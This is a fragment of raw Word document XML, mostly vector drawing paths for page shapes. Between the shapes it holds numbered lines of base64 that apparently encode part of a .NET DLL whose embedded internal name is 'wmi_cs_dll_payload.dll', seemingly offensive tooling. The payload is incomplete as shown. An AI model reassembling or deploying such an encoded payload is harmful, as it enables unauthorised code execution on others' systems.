13696,2909,13696,2908,13696,2907,13696,2907,13696,2906,13696,2905,13696,2904,13696,2903,13696,2903,13696,2902,13696,2901,13696,2900,13696,2899,13696,2898,13696,2897,13696,2896,13696,2895,13696,2894,13696,2893,13696,2892,13696,2890,13696,2889,13696,2888,13696,2887,13696,2885,13696,2884,13696,2883,13696,2881,13696,2880,13696,2878,13696,2877,13696,2875,13696,2874,13696,2872,13696,2870,13696,2869,13696,2867,13696,2865,13696,2863,13696,2861,13696,2859,13696,2857,13696,2855,13696,2853,13696,2851,13696,2849,13696,2847,13696,2845,13696,2843,13696,2840,13696,2838,13696,2836,13696,2833,13696,2831,13696,2828,13696,2826,13696,2823,13696,2820,13696,2818,13696,2815,13696,2812,13696,2809,13696,2806,13696,2803,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13695,2800,13695,2800,13695,2800,13695,2800,13695,2800,13695,2800,13695,2800,13694,2800,13694,2800,13694,2800,13694,2800,13694,2800,13693,2800,13693,2800,13693,2800,13692,2800,13692,2800,13691,2800,13691,2800,13690,2800,13690,2800,13689,2800,13689,2800,13688,2800,13688,2800,13687,2800,13686,2800,13685,2800,13685,2800,13684,2800,13683,2800,13682,2800,13681,2800,13680,2800,13679,2800,13678,2800,13677,2800,13676,2800,13675,2800,13673,2800,13672,2800,13671,2800,13669,2800,13668,2800,13666,2800,13665,2800,13663,2800,13662,2800,13660,2800,13658,2800,13656,2800,13654,2800,13652,2800,13650,2800,13648,2800,13646,2800,13644,2800,13642,2800,13639,2800,13637,2800,13635,2800,13632,2800,13629,2800,13627,2800,13624,2800,13621,2800,13618,2800,13615,2800,13612,2800,13609,2800,13606,2800,13603,2800,13600,2800,13596,2800,13593,2800,13589,2800,13586,2800,13582,2800,13578,2800,13574,2800,13570,2800,13566,2800,13562,2800,13558,2800,13553,2800,13549,2800,13544,2800,13540,2800,13535,2800,13530,2800,13526,2800,13521,2800,13516,2800,13510,2800,13505,2800,13500,2800,13494,2800,13489,2800,13483,2800,13477,2800,13472,2800,13466,2800,13460,2800,13453,2800,13447,2800,13441e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:702.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,14050" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:14050;width:130;height:270" coordorigin="2790,14050" coordsize="130,270" path="m2800,14071l2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2801,14071,2802,14071,2802,14071,2802,14071,2802,14071,2802,14071,2802,14071,2803,14071,2803,14071,2803,14071,2803,14071,2803,14071,2804,14071,2804,14071,2804,14071,2805,14071,2805,14071,2805,14071,2806,14071,2806,14071,2806,14071,2807,14071,2807,14071,2808,14071,2808,14071,2809,14071,2809,14071,2810,14071,2810,14071,2811,14071,2812,14071,2812,14071,2813,14071,2814,14071,2814,14071,2815,14071,2816,14071,2817,14071,2817,14071,2818,14071,2819,14071,2820,14071,2821,14071,2822,14071,2823,14071,2824,14071,2825,14071,2826,14071,2827,14071,2828,14071,2829,14071,2830,14071,2832,14071,2833,14071,2834,14071,2836,14071,2837,14071,2838,14071,2840,14071,2841,14071,2843,14071,2844,14071,2846,14071,2847,14071,2849,14071,2851,14071,2852,14071,2854,14071,2856,14071,2858,14071,2860,14071,2861,14071,2863,14071,2865,14071,2867,14071,2870,14071,2872,14071,2874,14071,2876,14071,2878,14071,2881,14071,2883,14071,2885,14071,2888,14071,2890,14071,2893,14071,2895,14071,2898,14071,2901,14071,2903,14071,2906,14071,2909,14071,2912,14071,2915,14071,2917,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14071,2920,14072,2920,14072,2920,14072,2920,14072,2920,14072,2920,14072,2920,14072,2920,14073,2920,14073,2920,14073,2920,14073,2920,14074,2920,14074,2920,14074,2920,14075,2920,14075,2920,14076,2920,14076,2920,14077,2920,14077,2920,14078,2920,14078,2920,14079,2920,14079,2920,14080,2920,14081,2920,14082,2920,14082,2920,14083,2920,14084,2920,14085,2920,14086,2920,14087,2920,14088,2920,14089,2920,14090,2920,14091,2920,14092,2920,14094,2920,14095,2920,14096,2920,14098,2920,14099,2920,14101,2920,14102,2920,14104,2920,14105,2920,14107,2920,14109,2920,14111,2920,14113,2920,14115,2920,14117,2920,14119,2920,14121,2920,14123,2920,14125,2920,14128,2920,14130,2920,14132,2920,14135,2920,14138,2920,14140,2920,14143,2920,14146,2920,14149,2920,14152,2920,14155,2920,14158,2920,14161,2920,14164,2920,14167,2920,14171,2920,14174,2920,14178,2920,14181,2920,14185,2920,14189,2920,14193,2920,14197,2920,14201,2920,14205,2920,14209,2920,14214,2920,14218,2920,14222,2920,14227,2920,14232,2920,14237,2920,14241,2920,14246,2920,14251,2920,14257,2920,14262,2920,14267,2920,14273,2920,14278,2920,14284,2920,14290,2920,14295,2920,14301,2920,14307,2920,14314,2920,14320,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2920,14326,2919,14326,2919,14326,2919,14326,2919,14326,2919,14326,2919,14326,2919,14326,2918,14326,2918,14326,2918,14326,2918,14326,2917,14326,2917,14326,2917,14326,2917,14326,2916,14326,2916,14326,2916,14326,2915,14326,2915,14326,2914,14326,2914,14326,2914,14326,2913,14326,2913,14326,2912,14326,2912,14326,2911,14326,2910,14326,2910,14326,2909,14326,2909,14326,2908,14326,2907,14326,2907,14326,2906,14326,2905,14326,2904,14326,2903,14326,2903,14326,2902,14326,2901,14326,2900,14326,2899,14326,2898,14326,2897,14326,2896,14326,2895,14326,2894,14326,2893,14326,2892,14326,2890,14326,2889,14326,2888,14326,2887,14326,2885,14326,2884,14326,2883,14326,2881,14326,2880,14326,2878,14326,2877,14326,2875,14326,2874,14326,2872,14326,2870,14326,2869,14326,2867,14326,2865,14326,2863,14326,2861,14326,2859,14326,2857,14326,2855,14326,2853,14326,2851,14326,2849,14326,2847,14326,2845,14326,2843,14326,2840,14326,2838,14326,2836,14326,2833,14326,2831,14326,2828,14326,2826,14326,2823,14326,2820,14326,2818,14326,2815,14326,2812,14326,2809,14326,2806,14326,2803,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14325,2800,14325,2800,14325,2800,14325,2800,14325,2800,14325,2800,14324,2800,14324,2800,14324,2800,14324,2800,14323,2800,14323,2800,14323,2800,14322,2800,14322,2800,14321,2800,14321,2800,14320,2800,14320,2800,14319,2800,14319,2800,14318,2800,14317,2800,14317,2800,14316,2800,14315,2800,14314,2800,14313,2800,14312,2800,14311,2800,14310,2800,14309,2800,14308,2800,14307,2800,14306,2800,14305,2800,14304,2800,14302,2800,14301,2800,14300,2800,14298,2800,14297,2800,14295,2800,14294,2800,14292,2800,14290,2800,14288,2800,14287,2800,14285,2800,14283,2800,14281,2800,14279,2800,14276,2800,14274,2800,14272,2800,14270,2800,14267,2800,14265,2800,14262,2800,14260,2800,14257,2800,14254,2800,14252,2800,14249,2800,14246,2800,14243,2800,14240,2800,14236,2800,14233,2800,14230,2800,14227,2800,14223,2800,14219,2800,14216,2800,14212,2800,14208,2800,14204,2800,14200,2800,14196,2800,14192,2800,14188,2800,14184,2800,14179,2800,14175,2800,14170,2800,14166,2800,14161,2800,14156,2800,14151,2800,14146,2800,14141,2800,14135,2800,14130,2800,14125,2800,14119,2800,14114,2800,14108,2800,14102,2800,14096,2800,14090,2800,14084,2800,14077,2800,14071e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:734.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,14690" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:14690;width:130;height:270" coordorigin="2790,14690" coordsize="130,270" path="m2800,14716l2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2801,14716,2802,14716,2802,14716,2802,14716,2802,14716,2802,14716,2802,14716,2803,14716,2803,14716,2803,14716,2803,14716,2803,14716,2804,14716,2804,14716,2804,14716,2805,14716,2805,14716,2805,14716,2806,14716,2806,14716,2806,14716,2807,14716,2807,14716,2808,14716,2808,14716,2809,14716,2809,14716,2810,14716,2810,14716,2811,14716,2812,14716,2812,14716,2813,14716,2814,14716,2814,14716,2815,14716,2816,14716,2817,14716,2817,14716,2818,14716,2819,14716,2820,14716,2821,14716,2822,14716,2823,14716,2824,14716,2825,14716,2826,14716,2827,14716,2828,14716,2829,14716,2830,14716,2832,14716,2833,14716,2834,14716,2836,14716,2837,14716,2838,14716,2840,14716,2841,14716,2843,14716,2844,14716,2846,14716,2847,14716,2849,14716,2851,14716,2852,14716,2854,14716,2856,14716,2858,14716,2860,14716,2861,14716,2863,14716,2865,14716,2867,14716,2870,14716,2872,14716,2874,14716,2876,14716,2878,14716,2881,14716,2883,14716,2885,14716,2888,14716,2890,14716,2893,14716,2895,14716,2898,14716,2901,14716,2903,14716,2906,14716,2909,14716,2912,14716,2915,14716,2917,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14716,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14717,2920,14718,2920,14718,2920,14718,2920,14718,2920,14719,2920,14719,2920,14719,2920,14719,2920,14720,2920,14720,2920,14720,2920,14721,2920,14721,2920,14722,2920,14722,2920,14723,2920,14723,2920,14724,2920,14725,2920,14725,2920,14726,2920,14727,2920,14728,2920,14728,2920,14729,2920,14730,2920,14731,2920,14732,2920,14733,2920,14734,2920,14735,2920,14736,2920,14738,2920,14739,2920,14740,2920,14742,2920,14743,2920,14744,2920,14746,2920,14747,2920,14749,2920,14751,2920,14752,2920,14754,2920,14756,2920,14758,2920,14760,2920,14762,2920,14764,2920,14766,2920,14768,2920,14771,2920,14773,2920,14775,2920,14778,2920,14780,2920,14783,2920,14786,2920,14788,2920,14791,2920,14794,2920,14797,2920,14800,2920,14803,2920,14806,2920,14809,2920,14813,2920,14816,2920,14820,2920,14823,2920,14827,2920,14830,2920,14834,2920,14838,2920,14842,2920,14846,2920,14850,2920,14855,2920,14859,2920,14863,2920,14868,2920,14872,2920,14877,2920,14882,2920,14887,2920,14892,2920,14897,2920,14902,2920,14907,2920,14912,2920,14918,2920,14923,2920,14929,2920,14935,2920,14941,2920,14947,2920,14953,2920,14959,2920,14965,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2920,14972,2919,14972,2919,14972,2919,14972,2919,14972,2919,14972,2919,14972,2919,14972,2918,14972,2918,14972,2918,14972,2918,14972,2917,14972,2917,14972,2917,14972,2917,14972,2916,14972,2916,14972,2916,14972,2915,14972,2915,14972,2914,14972,2914,14972,2914,14972,2913,14972,2913,14972,2912,14972,2912,14972,2911,14972,2910,14972,2910,14972,2909,14972,2909,14972,2908,14972,2907,14972,2907,14972,2906,14972,2905,14972,2904,14972,2903,14972,2903,14972,2902,14972,2901,14972,2900,14972,2899,14972,2898,14972,2897,14972,2896,14972,2895,14972,2894,14972,2893,14972,2892,14972,2890,14972,2889,14972,2888,14972,2887,14972,2885,14972,2884,14972,2883,14972,2881,14972,2880,14972,2878,14972,2877,14972,2875,14972,2874,14972,2872,14972,2870,14972,2869,14972,2867,14972,2865,14972,2863,14972,2861,14972,2859,14972,2857,14972,2855,14972,2853,14972,2851,14972,2849,14972,2847,14972,2845,14972,2843,14972,2840,14972,2838,14972,2836,14972,2833,14972,2831,14972,2828,14972,2826,14972,2823,14972,2820,14972,2818,14972,2815,14972,2812,14972,2809,14972,2806,14972,2803,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14971,2800,14970,2800,14970,2800,14970,2800,14970,2800,14970,2800,14969,2800,14969,2800,14969,2800,14969,2800,14968,2800,14968,2800,14967,2800,14967,2800,14967,2800,14966,2800,14966,2800,14965,2800,14964,2800,14964,2800,14963,2800,14963,2800,14962,2800,14961,2800,14960,2800,14959,2800,14959,2800,14958,2800,14957,2800,14956,2800,14955,2800,14954,2800,14953,2800,14951,2800,14950,2800,14949,2800,14948,2800,14946,2800,14945,2800,14943,2800,14942,2800,14940,2800,14939,2800,14937,2800,14935,2800,14934,2800,14932,2800,14930,2800,14928,2800,14926,2800,14924,2800,14922,2800,14920,2800,14917,2800,14915,2800,14913,2800,14910,2800,14908,2800,14905,2800,14902,2800,14900,2800,14897,2800,14894,2800,14891,2800,14888,2800,14885,2800,14882,2800,14879,2800,14875,2800,14872,2800,14868,2800,14865,2800,14861,2800,14857,2800,14854,2800,14850,2800,14846,2800,14842,2800,14838,2800,14833,2800,14829,2800,14825,2800,14820,2800,14816,2800,14811,2800,14806,2800,14801,2800,14796,2800,14791,2800,14786,2800,14781,2800,14775,2800,14770,2800,14764,2800,14759,2800,14753,2800,14747,2800,14741,2800,14735,2800,14729,2800,14723,2800,14716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:766.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,15330" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:15330;width:130;height:270" coordorigin="2790,15330" coordsize="130,270" path="m2800,15347l2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2801,15347,2802,15347,2802,15347,2802,15347,2802,15347,2802,15347,2802,15347,2803,15347,2803,15347,2803,15347,2803,15347,2803,15347,2804,15347,2804,15347,2804,15347,2805,15347,2805,15347,2805,15347,2806,15347,2806,15347,2806,15347,2807,15347,2807,15347,2808,15347,2808,15347,2809,15347,2809,15347,2810,15347,2810,15347,2811,15347,2812,15347,2812,15347,2813,15347,2814,15347,2814,15347,2815,15347,2816,15347,2817,15347,2817,15347,2818,15347,2819,15347,2820,15347,2821,15347,2822,15347,2823,15347,2824,15347,2825,15347,2826,15347,2827,15347,2828,15347,2829,15347,2830,15347,2832,15347,2833,15347,2834,15347,2836,15347,2837,15347,2838,15347,2840,15347,2841,15347,2843,15347,2844,15347,2846,15347,2847,15347,2849,15347,2851,15347,2852,15347,2854,15347,2856,15347,2858,15347,2860,15347,2861,15347,2863,15347,2865,15347,2867,15347,2870,15347,2872,15347,2874,15347,2876,15347,2878,15347,2881,15347,2883,15347,2885,15347,2888,15347,2890,15347,2893,15347,2895,15347,2898,15347,2901,15347,2903,15347,2906,15347,2909,15347,2912,15347,2915,15347,2917,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15348,2920,15348,2920,15348,2920,15348,2920,15348,2920,15349,2920,15349,2920,15349,2920,15349,2920,15350,2920,15350,2920,15350,2920,15351,2920,15351,2920,15352,2920,15352,2920,15353,2920,15353,2920,15354,2920,15354,2920,15355,2920,15356,2920,15356,2920,15357,2920,15358,2920,15359,2920,15360,2920,15361,2920,15361,2920,15362,2920,15363,2920,15365,2920,15366,2920,15367,2920,15368,2920,15369,2920,15371,2920,15372,2920,15373,2920,15375,2920,15376,2920,15378,2920,15379,2920,15381,2920,15383,2920,15385,2920,15386,2920,15388,2920,15390,2920,15392,2920,15394,2920,15396,2920,15399,2920,15401,2920,15403,2920,15406,2920,15408,2920,15411,2920,15413,2920,15416,2920,15419,2920,15421,2920,15424,2920,15427,2920,15430,2920,15433,2920,15436,2920,15440,2920,15443,2920,15446,2920,15450,2920,15453,2920,15457,2920,15461,2920,15465,2920,15469,2920,15472,2920,15477,2920,15481,2920,15485,2920,15489,2920,15494,2920,15498,2920,15503,2920,15507,2920,15512,2920,15517,2920,15522,2920,15527,2920,15532,2920,15537,2920,15543,2920,15548,2920,15554,2920,15559,2920,15565,2920,15571,2920,15577,2920,15583,2920,15589,2920,15595,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2919,15602,2919,15602,2919,15602,2919,15602,2919,15602,2919,15602,2919,15602,2918,15602,2918,15602,2918,15602,2918,15602,2917,15602,2917,15602,2917,15602,2917,15602,2916,15602,2916,15602,2916,15602,2915,15602,2915,15602,2914,15602,2914,15602,2914,15602,2913,15602,2913,15602,2912,15602,2912,15602,2911,15602,2910,15602,2910,15602,2909,15602,2909,15602,2908,15602,2907,15602,2907,15602,2906,15602,2905,15602,2904,15602,2903,15602,2903,15602,2902,15602,2901,15602,2900,15602,2899,15602,2898,15602,2897,15602,2896,15602,2895,15602,2894,15602,2893,15602,2892,15602,2890,15602,2889,15602,2888,15602,2887,15602,2885,15602,2884,15602,2883,15602,2881,15602,2880,15602,2878,15602,2877,15602,2875,15602,2874,15602,2872,15602,2870,15602,2869,15602,2867,15602,2865,15602,2863,15602,2861,15602,2859,15602,2857,15602,2855,15602,2853,15602,2851,15602,2849,15602,2847,15602,2845,15602,2843,15602,2840,15602,2838,15602,2836,15602,2833,15602,2831,15602,2828,15602,2826,15602,2823,15602,2820,15602,2818,15602,2815,15602,2812,15602,2809,15602,2806,15602,2803,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15601,2800,15601,2800,15601,2800,15601,2800,15601,2800,15601,2800,15601,2800,15600,2800,15600,2800,15600,2800,15600,2800,15599,2800,15599,2800,15599,2800,15599,2800,15598,2800,15598,2800,15597,2800,15597,2800,15596,2800,15596,2800,15595,2800,15595,2800,15594,2800,15594,2800,15593,2800,15592,2800,15591,2800,15591,2800,15590,2800,15589,2800,15588,2800,15587,2800,15586,2800,15585,2800,15584,2800,15583,2800,15582,2800,15581,2800,15579,2800,15578,2800,15577,2800,15575,2800,15574,2800,15572,2800,15571,2800,15569,2800,15567,2800,15566,2800,15564,2800,15562,2800,15560,2800,15558,2800,15556,2800,15554,2800,15552,2800,15550,2800,15548,2800,15545,2800,15543,2800,15541,2800,15538,2800,15535,2800,15533,2800,15530,2800,15527,2800,15524,2800,15521,2800,15518,2800,15515,2800,15512,2800,15509,2800,15506,2800,15502,2800,15499,2800,15495,2800,15491,2800,15488,2800,15484,2800,15480,2800,15476,2800,15472,2800,15468,2800,15464,2800,15459,2800,15455,2800,15450,2800,15446,2800,15441,2800,15436,2800,15432,2800,15427,2800,15422,2800,15416,2800,15411,2800,15406,2800,15400,2800,15395,2800,15389,2800,15383,2800,15378,2800,15372,2800,15366,2800,15359,2800,15353,2800,15347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95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"AAIBEikRLQQAARgKCAAEAR0FCBgIAgYYCAcFHQUJGAkYBCABAQ4IAQAIAAAAAAAeAQABA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FQCFldy"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96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"YXBOb25FeGNlcHRpb25UaHJvd3MBgJ4uAYCEU3lzdGVtLlNlY3VyaXR5LlBlcm1pc3Npb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25zLlNl"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97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"Y3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuM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CwgQ3Vs"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98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"dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5FQFUAhBTa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2lwVmVy"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99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="53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"aWZpY2F0aW9uAQAAAOgpAAAAAAAAAAAAAP4pAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAA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ADwKQAA"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"AAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAAAAAA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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA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"AQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAB0AgAAAAAAAAAAAAB0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AjQAAABW"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"AFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAAAAAAAAAAA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"PwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBu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AGYAbwAA"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"AAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAE1AEAAAEAUwB0AHIA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aQBuAGcA"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"RgBpAGwAZQBJAG4AZgBvAAAAsAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBp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AGwAZQBE"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"AGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMA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aQBvAG4A"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"AAAAADAALgAwAC4AMAAuADAAAABQABcAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAA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AHcAbQBp"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"AF8AYwBzAF8AZABsAGwAXwBwAGEAeQBsAG8AYQBkAC4AZABsAGwAAAAAACgAAgABAEwA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ZQBnAGEA"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group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840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1000,10484,1000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1000,1517,1000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31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:630" coordorigin="1490,1630" coordsize="8990,63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6,10484,1646,10484,1646,10484,1646,10484,1647,10484,1647,10484,1647,10484,1648,10484,1648,10484,1649,10484,1649,10484,1650,10484,1651,10484,1651,10484,1652,10484,1653,10484,1654,10484,1655,10484,1656,10484,1657,10484,1658,10484,1660,10484,1661,10484,1662,10484,1664,10484,1665,10484,1667,10484,1669,10484,1671,10484,1673,10484,1675,10484,1677,10484,1679,10484,1681,10484,1684,10484,1686,10484,1689,10484,1692,10484,1694,10484,1697,10484,1701,10484,1704,10484,1707,10484,1711,10484,1714,10484,1718,10484,1722,10484,1726,10484,1730,10484,1734,10484,1738,10484,1743,10484,1748,10484,1752,10484,1757,10484,1762,10484,1768,10484,1773,10484,1779,10484,1784,10484,1790,10484,1796,10484,1803,10484,1809,10484,1816,10484,1822,10484,1829,10484,1836,10484,1844,10484,1851,10484,1859,10484,1867,10484,1875,10484,1883,10484,1891,10484,1900,10484,1909,10484,1918,10484,1927,10484,1936,10484,1946,10484,1955,10484,1966,10484,1976,10484,1986,10484,1997,10484,2008,10484,2019,10484,2030,10484,2042,10484,2054,10484,2066,10484,2078,10484,2090,10484,2103,10484,2116,10484,2129,10484,2143,10484,2156,10484,2170,10484,2185,10484,2199,10484,2214,10484,2229,10484,2244,10484,2259,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10483,2275,10482,2275,10482,2275,10480,2275,10479,2275,10477,2275,10475,2275,10473,2275,10470,2275,10466,2275,10462,2275,10458,2275,10453,2275,10448,2275,10442,2275,10435,2275,10428,2275,10419,2275,10411,2275,10401,2275,10391,2275,10379,2275,10367,2275,10354,2275,10340,2275,10326,2275,10310,2275,10293,2275,10275,2275,10256,2275,10236,2275,10215,2275,10192,2275,10168,2275,10143,2275,10117,2275,10090,2275,10061,2275,10031,2275,9999,2275,9966,2275,9931,2275,9895,2275,9858,2275,9819,2275,9778,2275,9735,2275,9691,2275,9646,2275,9598,2275,9549,2275,9498,2275,9445,2275,9391,2275,9334,2275,9275,2275,9215,2275,9153,2275,9088,2275,9022,2275,8953,2275,8883,2275,8810,2275,8735,2275,8658,2275,8578,2275,8497,2275,8413,2275,8326,2275,8238,2275,8146,2275,8053,2275,7957,2275,7859,2275,7758,2275,7654,2275,7548,2275,7439,2275,7328,2275,7214,2275,7097,2275,6977,2275,6855,2275,6730,2275,6602,2275,6471,2275,6337,2275,6201,2275,6061,2275,5918,2275,5773,2275,5624,2275,5472,2275,5317,2275,5159,2275,4997,2275,4833,2275,4665,2275,4494,2275,4319,2275,4141,2275,3960,2275,3776,2275,3587,2275,3396,2275,3201,2275,3002,2275,2800,2275,2594,2275,2385,2275,2172,2275,1955,2275,1734,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2274,1510,2274,1510,2274,1510,2274,1510,2274,1510,2273,1510,2273,1510,2273,1510,2272,1510,2272,1510,2271,1510,2271,1510,2270,1510,2269,1510,2269,1510,2268,1510,2267,1510,2266,1510,2265,1510,2264,1510,2263,1510,2262,1510,2260,1510,2259,1510,2258,1510,2256,1510,2255,1510,2253,1510,2251,1510,2249,1510,2247,1510,2245,1510,2243,1510,2241,1510,2239,1510,2236,1510,2234,1510,2231,1510,2228,1510,2226,1510,2223,1510,2219,1510,2216,1510,2213,1510,2209,1510,2206,1510,2202,1510,2198,1510,2194,1510,2190,1510,2186,1510,2182,1510,2177,1510,2172,1510,2168,1510,2163,1510,2158,1510,2152,1510,2147,1510,2141,1510,2136,1510,2130,1510,2124,1510,2117,1510,2111,1510,2104,1510,2098,1510,2091,1510,2084,1510,2076,1510,2069,1510,2061,1510,2053,1510,2045,1510,2037,1510,2029,1510,2020,1510,2011,1510,2002,1510,1993,1510,1984,1510,1974,1510,1964,1510,1954,1510,1944,1510,1934,1510,1923,1510,1912,1510,1901,1510,1890,1510,1878,1510,1866,1510,1854,1510,1842,1510,1830,1510,1817,1510,1804,1510,1791,1510,1777,1510,1764,1510,1750,1510,1735,1510,1721,1510,1706,1510,1691,1510,1676,1510,1661,1510,1645e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="30,650">
